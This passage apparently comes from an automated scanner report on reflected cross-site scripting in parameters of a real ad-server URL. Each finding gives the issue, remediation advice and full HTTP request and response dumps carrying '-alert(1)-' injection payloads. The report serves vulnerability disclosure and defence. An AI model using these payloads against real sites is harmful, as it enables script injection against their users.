Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:20:29 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
B42625058/42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178c33f5'-alert(1)-'4dfa122d9d8&_pm=97956&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/3998752" target="_blank">
...[SNIP]...

1.52. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbe36'-alert(1)-'583b7cb77ec was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229bbe36'-alert(1)-'583b7cb77ec&_c=17169178&_pm=97956&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:19:56 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
07-300/250%3B42625058/42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229bbe36'-alert(1)-'583b7cb77ec&_c=17169178&_pm=97956&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/3965298" target="_blank">
...[SNIP]...

1.53. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_eo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 708c8'-alert(1)-'68bf9185ea8 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956708c8'-alert(1)-'68bf9185ea8&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:17:42 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
f/d3/%2a/x%3B242474299%3B0-0%3B0%3B65365865%3B4307-300/250%3B42625058/42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956708c8'-alert(1)-'68bf9185ea8&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/3831517" target="_blank">
...[SNIP]...

1.54. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_et parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88478'-alert(1)-'cd68f8a5b was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=130922735088478'-alert(1)-'cd68f8a5b&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1980
Date: Tue, 28 Jun 2011 02:18:15 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
2474299%3B0-0%3B0%3B65365865%3B4307-300/250%3B42625058/42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=130922735088478'-alert(1)-'cd68f8a5b&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/3865002" target="_blank">
...[SNIP]...

1.55. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22a18'-alert(1)-'99b4bb5bd72 was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=1716917522a18'-alert(1)-'99b4bb5bd72&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:17:08 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
3Dv8/3b34/f/d3/%2a/x%3B242474299%3B0-0%3B0%3B65365865%3B4307-300/250%3B42625058/42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=1716917522a18'-alert(1)-'99b4bb5bd72&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/3797861" target="_blank">
...[SNIP]...

1.56. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_pm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9639'-alert(1)-'96a1af39904 was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956e9639'-alert(1)-'96a1af39904&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:21:03 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956e9639'-alert(1)-'96a1af39904&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/4032189" target="_blank">
...[SNIP]...

1.57. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_pn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfdeb'-alert(1)-'000ca2f821b was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677cfdeb'-alert(1)-'000ca2f821b&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:21:36 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
u%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677cfdeb'-alert(1)-'000ca2f821b&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/4065736" target="_blank">
...[SNIP]...

1.58. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d6cb'-alert(1)-'6f19826f6fc was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=116831d6cb'-alert(1)-'6f19826f6fc&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
